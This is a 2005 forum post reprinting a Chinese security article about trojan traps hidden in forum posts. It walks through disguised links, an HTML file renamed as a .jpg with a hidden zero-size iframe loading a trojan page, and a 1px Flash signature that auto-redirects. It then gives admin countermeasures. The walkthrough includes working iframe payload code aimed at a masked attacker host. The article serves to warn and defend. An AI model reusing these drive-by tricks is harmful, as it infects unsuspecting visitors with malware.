|
論壇說明 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2005-08-24, 01:41 PM | #1 |
榮譽會員
|
「挖」出論壇帖子中暗藏的陷阱
小李平時很喜歡泡論壇,這天他到自己常去的一個論壇回帖之後,電腦莫名其妙地重啟,重新開機之後感覺系統變得很慢。莫非帖子中暗藏機關?小李更新殺毒軟體的
病毒 庫後一查,果然自己的系統中了 木馬 …… 論壇往往是一個網站中人氣最旺的地方,但很少有人注意到論壇給瀏覽者帶來的安全問題,而像小李這樣的遭遇卻是真實存在的!下面我們就為大家「挖」出論壇帖子中暗藏的害人陷阱。 瀏覽帖子有隱憂 現在很多論壇程序在開發時,會增加一些延伸功能,例如:可以在帖子中引用UBB標籤,可以在帖子中隱藏網頁真實位址,可以在個人簽名中加入特殊效果等。 這些功能雖然方便了瀏覽者,但同時也帶來很多安全隱患。惡意攻擊者可能借助這些功能,使用網頁木馬等攻擊瀏覽者的系統。我們在這裡模擬攻擊者,為大家揭露這些攻擊手法。 製造「陷阱」 選項任一功能稍微強大的論壇(例如動網,它在國內非常流行,而且所帶的延伸功能非常多)下手。 先利用網頁木馬產生器製作木馬網頁,它利用的是IE瀏覽器 漏洞 。開啟網頁木馬產生器,按下 「選項」按鈕,然後選項木馬程序mm.exe,產生2個文件:mm.chm和mm.html(圖1)。將這兩個文件以及木馬程序mm.exe上傳到網站空間中,就可以得到一個木馬網頁,位址以mm.html結尾,例如: http://www.***.com/mm.html)。 圖1 利用網頁木馬產生器產生木馬網頁 接下來就是利用論壇的一些延伸功能暗布「陷阱」,使瀏覽者在無意間開啟帖子時中招。 使用陷阱 1.陷阱一:文字誘騙 通過帖子中的文字誘騙你按下木馬網頁連接,這是論壇帖子中最一般的「陷阱」。 攻擊者進入準備下手的論壇,申請帳號,然後到其中任一版塊發表帖子。帖子內容一般是帶有誘惑性的訊息: 這裡有最新最熱的遊戲資料和demo下載,趕快進來吧! 輸入完畢之後,發表帖子。 小提示:這裡發表帖子使用的「」標籤是動網論壇的內裝標籤,可以起到連接的作用,其他論壇也有使用此標籤的。 當你瀏覽這個帖子時,會發現帖子中只顯示了文本內容: 這裡有最新最熱的遊戲資料和demo下載,趕快進來吧! 一般不清楚的人都會好奇地開啟檢視,從而開啟了木馬網頁http://www.***.com/mm.html,使自己的系統被種植了木馬。 其實只要把滑鼠游標放到文字上,就會在IE瀏覽器的左下角顯示這個連接的真實位址http://www.***.com/mm.html(圖2)。 碰到這樣的帖子,可得多個心眼 如果你遇到了這樣富有誘惑力的帖子,千萬不要貿然地開啟檢視,因為裡面可能隱藏的就是木馬網頁。 .陷阱二:圖片誘騙 在帖子中顯示一張很大的圖片,你為了觀看全貌,就對圖片進行點擊,選項在新視窗中開啟檢視。這樣就會開啟木馬 網頁,而你看到的仍然是圖片。 攻擊者首先準備一張超寬的圖片(超過帖子頁面限制),命名為「022.jpg」(此處檔案名「022.jpg」中的「0」是阿拉伯數位),將其上傳到網站空間得到位址:http://www.***.com/022.jpg,再將以下程式碼儲存在記事本中: <img aligh=middle src="022.jpg"><iframe src="http://www.***.com/mm.html" name="zhu" width="0" height="0" frameborder="0"><br> 儲存檔案名為:O22.jpg(此處檔案名「O22.jpg」中的「O」是大寫字母)。 將含有程式碼的O22.jpg文件上傳到網站空間圖片文件022.jpg的同一路徑下,得到位址:http://www.***.com/O22.jpg,這樣就得到了一個圖片木馬的位址。 小提示:雖然將htm文件的後面名改為jpg,但是在開啟的時候,瀏覽器仍然會以網頁的形式開啟,這樣就執行了其中的程式碼,而其中的程式碼則是連接到木馬網頁位址http://www.***.com/mm.html,從而使你的系統中木馬。 進入論壇,在帖子中輸入如下程式碼: 這行程式碼的含義是使帖子中顯示一張圖片,圖片為http://www.***.com/022.jpg,而其連接到的位址是http://www.***.com/O22.jpg(木馬網頁的位址)。 這段程式碼中暗藏玄機 這樣帖子顯示的是一幅圖片022.jpg,由於圖片022.jpg非常寬,所以帖子中只顯示了部分圖片,而你為了看到圖片的全貌,必然點擊圖片,想在新視窗中開啟圖片,這樣就開啟了木馬網頁http://www.***.com/O22.jpg。雖然後台開啟了木馬網頁,但是圖片仍然正常顯示,因為O22.jpg中包含了一句程式碼:<img aligh=middle src="022.jpg">,即表面上仍然顯示022.jpg圖片文件。 3.陷阱三:動畫簽名誘騙 個人簽名是論壇的特色,如果論壇在預設情況下允許使用Flash動畫作為論壇簽名,攻擊者完全可以構造一個存在惡意功能的Flash動畫作為論壇簽名,從而實現 木馬 網頁的大面積傳播。下面就為大家揭示這種攻擊手法。 Flash MX有一個功能叫「get url」,它能夠在你欣賞Flash動畫時自動跳轉到「get url」中設定的URL位址,從而開啟新的網站位址。攻擊者完全可以利用「get url」功能製作Flash動畫,使你在訪問時自動跳轉到一些惡意網頁(例如木馬網頁)。 首先,開啟Flash MX,按下工作列中的「修改」,開啟「修改我的文件內容」面板,設定Flash的尺寸,將其寬和高都設為1px,其餘的選項保持不變。 之所以將寬和高都設為1px,是因為px值越小,Flash動畫下載得越快。 其次,在動畫我的文件下方的「動作」欄進行設定,先選項「actions」,然後選項其中的「getURL」動作,雙按它,出現設定該動作的面板(圖4)。 在其中的URL項目中填寫要跳轉的位址,視窗選項「_blank」(開啟一個新視窗顯示URL)。 最後,在「getURL」中填寫一些惡性網站的位址,例如木馬網頁位址http://www.***.com/mm.html。 產生惡意Falsh動畫 設定好之後,按下工作列的「文件」→「輸出」,產生動畫,然後將這個動畫上傳到網站空間中,得到位址:http://www.***.com/test.swf。 步驟3:進入論壇修改註冊帳號的個人簽名,加入以下程式碼: ******* http://www.***.com/test.swf******** 提交修改資料,就獲得了一個惡意的論壇Falsh簽名。你一旦開啟帶有這種簽名的帖子,惡意Flash文件就會悄悄執行,並開啟木馬網頁,使你的系統在毫無察覺的情況下中木馬。 產生惡意論壇簽名 論壇的延伸功能造成的「陷阱」就為大家介紹到這裡,大家在瀏覽帖子的時候需要加倍小心。 編後:如果你是一個論壇的管理員,當看到惡意攻擊者在你的論壇發佈惡意帖子,應該怎麼辦呢?以動網論壇為例,進入論壇的管理後台,依次進入「論壇管理」→「管理」→「進階設定」中,將「帖子相關設定」中的HTML程式碼解析,UBB程式碼解析等功能關閉掉(圖6)。 再進去入「論壇一般設定」中,將「用戶選項」中的用戶簽名是否開啟UBB程式碼,用戶是否開啟Flash標籤等功能關閉,這樣就杜絕了攻擊者利用這種誘騙的手法來到論壇搗亂。 |
__________________ |
|
送花文章: 3,
|